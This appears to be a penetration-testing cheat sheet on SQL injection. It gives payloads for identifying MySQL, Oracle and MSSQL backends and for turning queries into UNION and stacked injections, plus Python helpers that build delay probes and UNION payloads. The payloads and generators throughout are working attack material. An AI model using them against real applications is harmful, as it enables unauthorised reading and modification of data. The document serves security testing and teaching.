DBMS Identification (MySQL)

Detecting which Database Management System (DBMS) is in use is the first step in exploiting an injection further. Without that knowledge you cannot tell which tables to query, which functions are built in, or which detections to avoid. A successful response to one of the queries below indicates that the corresponding DBMS is in use.

Note: The comment characters -- are placed after the query to strip any commands that follow the injection point, which helps prevent syntax errors. MySQL only treats -- as a comment when it is followed by whitespace (or use # instead), so the payloads below end in "-- " and that trailing space must survive URL encoding (send it as %20 or +).

Description / Query

SLEEP
Note: SLEEP(1) pauses for one second and returns 0, so the response is delayed only if the DBMS is MySQL.
page.php?id=1'-SLEEP(1)=0 LIMIT 1 -- 

BENCHMARK
Note: BENCHMARK() evaluates the expression the given number of times, so the delay depends on server speed rather than a fixed number of seconds. ENCODE() was removed in MySQL 8.0; on newer servers substitute a function that still exists, for example BENCHMARK(5000000, MD5('Slow Down')).
page.php?id=1'-BENCHMARK(5000000, ENCODE('Slow Down','by 5 seconds'))=0 LIMIT 1 -- 

String concatenation
Note: MySQL joins adjacent string literals, so ' 'mysql' is valid syntax only on MySQL.
page.php?id=' 'mysql' -- 

Error messages
Note: Triggering DB errors through invalid syntax will sometimes return verbose error messages that include the DBMS name ("You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version ...").
page.php?id='

General Tips

PHP applications are commonly backed by MySQL (or MariaDB), but treat this as a starting guess and confirm it with the queries above.

Converting queries to injections

Now that the injection has been identified, the rest of this guide gives full queries. Use the methods below to insert those queries at your injection point. SELECT @@version is the example query.

Description / Query

Union
product.php?id=' UNION SELECT @@version -- 

Union subquery
product.php?id=' UNION (SELECT @@version) -- 

Union null
Note: A UNION must return the same number of columns as the original query. If the original query returns more columns than the injected SELECT, pad the injected SELECT with null until the counts match (in this example the original query returns two columns). When the parameter is numeric, keep the original value in place of the closing quote, as below.
product.php?id=4 UNION SELECT @@version,null -- 

Stacked queries
Note: Stacked queries do not always return results, so they are best used for injections that update or modify data. Whether they run at all depends on the client API: mysql_query() and mysqli_query() execute a single statement per call, while mysqli_multi_query() allows several. Identifiers must be unquoted or backtick-quoted in MySQL; single-quoted names are string literals and the statement fails.
product.php?id='; INSERT INTO `docs` (`content`) VALUES ((SELECT @@version)) -- 

DBMS Identification (Oracle)

The same approach as in the previous section applies: a successful response from one of the queries below indicates Oracle. The trailing -- comment strips whatever follows the injection point; unlike MySQL, Oracle does not require a space after --.

Description / Query

String concatenation
Note: || is Oracle's string concatenation operator (MySQL treats || as logical OR unless PIPES_AS_CONCAT is enabled, and MSSQL rejects it).
page.jsp?id='||'oracle' --

Default table
Note: v$version is a built-in Oracle view. Keep a space after the closing quote: '' directly followed by UNION is read as an escaped quote inside the original string and the payload never leaves the literal. The injected SELECT must match the original query's column count and data types.
page.jsp?id=' UNION SELECT 1 FROM v$version --

Error messages
Note: Triggering DB errors through invalid syntax will sometimes return verbose error messages that include the DBMS name.
page.jsp?id='

General Tips

Depending on the error returned by the application, an "ORA-" prefix followed by a five-digit number (for example ORA-00933: SQL command not properly ended, or ORA-01756: quoted string not properly terminated) means the database is Oracle.

JSP applications are often backed by Oracle, but treat this as a starting guess and confirm it with the queries above.

Converting queries to injections

Now that the injection has been identified, the rest of this guide gives full queries. Use the methods below to insert those queries at your injection point. SELECT banner FROM v$version is the example query.

Description / Query

Union
product.jsp?id=' UNION SELECT banner FROM v$version --

Union subquery
product.jsp?id=' UNION (SELECT banner FROM v$version) --

Union null
Note: A UNION must return the same number of columns as the original query, so pad the injected SELECT with null until the counts match (in this example the original query returns two columns). Oracle also requires a FROM clause on every SELECT; when the injected expressions need no real table, use FROM dual.
product.jsp?id=' UNION SELECT banner,null FROM v$version --

DBMS Identification (MSSQL)

The same approach as in the previous sections applies: a successful response from one of the queries below indicates Microsoft SQL Server (MSSQL). The trailing -- comment strips whatever follows the injection point and needs no trailing space.

Description / Query

WAITFOR function
Note: WAITFOR DELAY is T-SQL only; a response delayed by ten seconds confirms MSSQL. Because it is sent as a second statement, a delay also confirms that stacked queries work at this injection point.
page.asp?id=';WAITFOR DELAY '00:00:10'; --

Default variable
Note: @@SERVERNAME is an MSSQL-specific global variable.
page.asp?id=sql'; SELECT @@SERVERNAME --

Error messages
Note: Triggering DB errors through invalid syntax will sometimes return verbose error messages that include the DBMS name (for example "Unclosed quotation mark after the character string").
page.asp?id='

Error messages (conversion)
Note: If the id parameter is an integer, the string value of the @@SERVERNAME variable causes a conversion error ("Conversion failed when converting the nvarchar value '...' to data type int"), which also leaks the server name.
page.asp?id=@@SERVERNAME

Error messages (forced conversion)
Note: Dividing by @@SERVERNAME forces an arithmetic conversion of its string value, producing the same conversion error even when the parameter is not an integer.
page.asp?id=0/@@SERVERNAME

General Tips

ASP and ASP.NET applications are commonly backed by MSSQL, but treat this as a starting guess and confirm it with the queries above.
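The identification tables for MySQL, Oracle and MSSQL above all rely on the same two signals: a verbose error message that names the DBMS, or a delay that only one DBMS's sleep function would produce. As an added example (this is not code from the NetSPI page), here is a small Python fingerprinter that builds the page's delay probes, URL-encodes them, and classifies responses from both signals. The error-message patterns are standard DBMS error texts; the URL, parameter name, timings and response bodies are constructed for the example.

```python
import re
from typing import Dict, Optional
from urllib.parse import urlencode

# Delay probes from the identification tables above; {d} is the delay in seconds.
# Only MySQL and MSSQL have a time-based probe on this page.
TIMING_PROBES = {
    "mysql": "1'-SLEEP({d})=0 LIMIT 1 -- ",           # trailing space is required by MySQL
    "mssql": "';WAITFOR DELAY '00:00:{d:02d}'; --",
}

# Error-message signatures: well-known DBMS error texts, not taken from any particular
# target. The PHP function names are only a hint that the MySQL extension is in use.
ERROR_SIGNATURES = {
    "mysql": [
        r"You have an error in your SQL syntax",
        r"mysql_fetch_array\(\)|mysqli_",
    ],
    "oracle": [
        r"\bORA-\d{5}\b",
    ],
    "mssql": [
        r"Unclosed quotation mark after the character string",
        r"Incorrect syntax near",
        r"Conversion failed when converting the \w+ value",
    ],
}


def timing_probe(dbms: str, delay: int) -> str:
    """Build the delay probe for one DBMS with the requested delay in seconds."""
    return TIMING_PROBES[dbms].format(d=delay)


def probe_url(base_url: str, param: str, payload: str) -> str:
    """URL-encode a payload into a GET parameter so quotes, parentheses and the
    trailing comment space survive the trip through browser and web server."""
    return f"{base_url}?{urlencode({param: payload})}"


def fingerprint_from_error(body: str) -> Optional[str]:
    """Return the DBMS whose error signature appears in a response body, or None."""
    for dbms, patterns in ERROR_SIGNATURES.items():
        if any(re.search(p, body, re.IGNORECASE) for p in patterns):
            return dbms
    return None


def fingerprint_from_timing(baseline: float, measured: Dict[str, float], delay: int) -> Optional[str]:
    """Decide which delay probe actually stalled the server.

    measured maps dbms -> response time in seconds for that DBMS's probe.
    A probe counts as a hit only if it exceeded the baseline by most of the
    requested delay. Zero hits, or more than one (network jitter, a WAF that
    stalls every request), is ambiguous and yields None instead of a guess.
    """
    hits = [d for d, t in measured.items() if t - baseline >= 0.8 * delay]
    return hits[0] if len(hits) == 1 else None


def identify(baseline: float, measured: Dict[str, float], delay: int,
             error_body: str = "") -> Optional[str]:
    """Combine both signals: a verbose error is the stronger evidence,
    a single clean timing hit is the fallback."""
    return fingerprint_from_error(error_body) or fingerprint_from_timing(baseline, measured, delay)


if __name__ == "__main__":
    # Constructed sample data standing in for real requests and responses.
    base = "http://target.example/page.php"
    for dbms in TIMING_PROBES:
        print(dbms, probe_url(base, "id", timing_probe(dbms, 5)))
    print(identify(0.2, {"mysql": 5.3, "mssql": 0.25}, 5))
    print(identify(0.2, {"mysql": 0.2, "mssql": 0.2}, 5,
                   "ORA-00933: SQL command not properly ended"))
```

Measure the baseline against a benign value of the same parameter first, and send each delay probe more than once; a single slow response is not evidence of anything.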

Converting queries to injections

Now that the injection has been identified, the rest of this guide gives full queries. Use the methods below to insert those queries at your injection point. SELECT @@version is the example query.

Description / Query

Union
product.asp?id=' UNION SELECT @@version --

Union subquery
product.asp?id=' UNION (SELECT @@version) --

Union null
Note: A UNION must return the same number of columns as the original query, so pad the injected SELECT with null until the counts match (in this example the original query returns two columns).
product.asp?id=' UNION (SELECT @@version,null) --

Stacked query
Note: Stacked queries do not always return results (the application usually renders only the first result set), so they are best used for injections that update or modify data. MSSQL executes multiple statements in one batch, so stacked queries generally work here.
product.asp?id='; SELECT @@version --
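The three Converting sections above each show the union, union-null and (where available) stacked forms for a two-column query. As an added example (not code from the NetSPI page), here is a Python helper that generalizes those conversions to any column count and rendered-column position across MySQL, Oracle and MSSQL, and renders the SQL the server would actually execute once the payload is concatenated into a hypothetical vulnerable query. The product table, column names, query templates and function names are assumptions made for the example.

```python
from typing import Dict, List, Optional

# Hypothetical server-side queries for a product page, built by string concatenation
# (the bug that makes the injection possible). The MySQL one uses a numeric parameter,
# the other two a quoted string, to show both contexts. Constructed for this example.
VULNERABLE_QUERIES: Dict[str, str] = {
    "mysql":  "SELECT name, price FROM products WHERE id={id}",
    "oracle": "SELECT name, price FROM products WHERE id='{id}'",
    "mssql":  "SELECT name, price FROM products WHERE id='{id}'",
}

# Comment sequence that removes the application's trailing quote; MySQL needs a space after --.
COMMENT: Dict[str, str] = {"mysql": "-- ", "oracle": "--", "mssql": "--"}


def union_payload(dbms: str, exprs: List[str], total_columns: int,
                  from_clause: Optional[str] = None, position: int = 0,
                  prefix: str = "'") -> str:
    """Build a UNION payload whose column count matches the original query.

    exprs         expressions to read, e.g. ["@@version"] or ["banner"]
    total_columns number of columns the original query returns
    from_clause   table or view the expressions come from, e.g. "v$version"
    position      index of the first column the page actually renders
    prefix        what terminates the original value: "'" in a string context,
                  or the original value itself (e.g. "4") in a numeric one
    """
    if position + len(exprs) > total_columns:
        raise ValueError("expressions do not fit into the original column count")
    cols = ["null"] * total_columns            # null is compatible with any column type
    cols[position:position + len(exprs)] = exprs
    select = "SELECT " + ",".join(cols)
    if from_clause:
        select += " FROM " + from_clause
    elif dbms == "oracle":
        select += " FROM dual"                 # Oracle rejects a SELECT without FROM
    return f"{prefix} UNION {select} {COMMENT[dbms]}"


def stacked_payload(dbms: str, statement: str, prefix: str = "'") -> str:
    """Terminate the original statement and append another one."""
    if dbms == "oracle":
        raise ValueError("stacked queries are not listed for Oracle on this page")
    return f"{prefix}; {statement} {COMMENT[dbms]}"


def render(dbms: str, payload: str) -> str:
    """Show the SQL the server executes once the payload is concatenated in."""
    return VULNERABLE_QUERIES[dbms].format(id=payload)


if __name__ == "__main__":
    for dbms, payload in [
        ("mysql",  union_payload("mysql", ["@@version"], 2, prefix="4")),
        ("oracle", union_payload("oracle", ["banner"], 2, from_clause="v$version")),
        ("mssql",  union_payload("mssql", ["@@version"], 3, position=1)),
        ("mssql",  stacked_payload("mssql", "SELECT @@version")),
    ]:
        print(f"{dbms:6} {payload}\n       {render(dbms, payload)}")
```

The rendered output makes the role of the comment visible: the application's own closing quote still arrives after the payload, and only the -- keeps it from breaking the statement. Work out total_columns first (by adding nulls until the UNION stops erroring); position then selects whichever column the page displays.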

© 2018 Copyright by NetSPI. All rights reserved.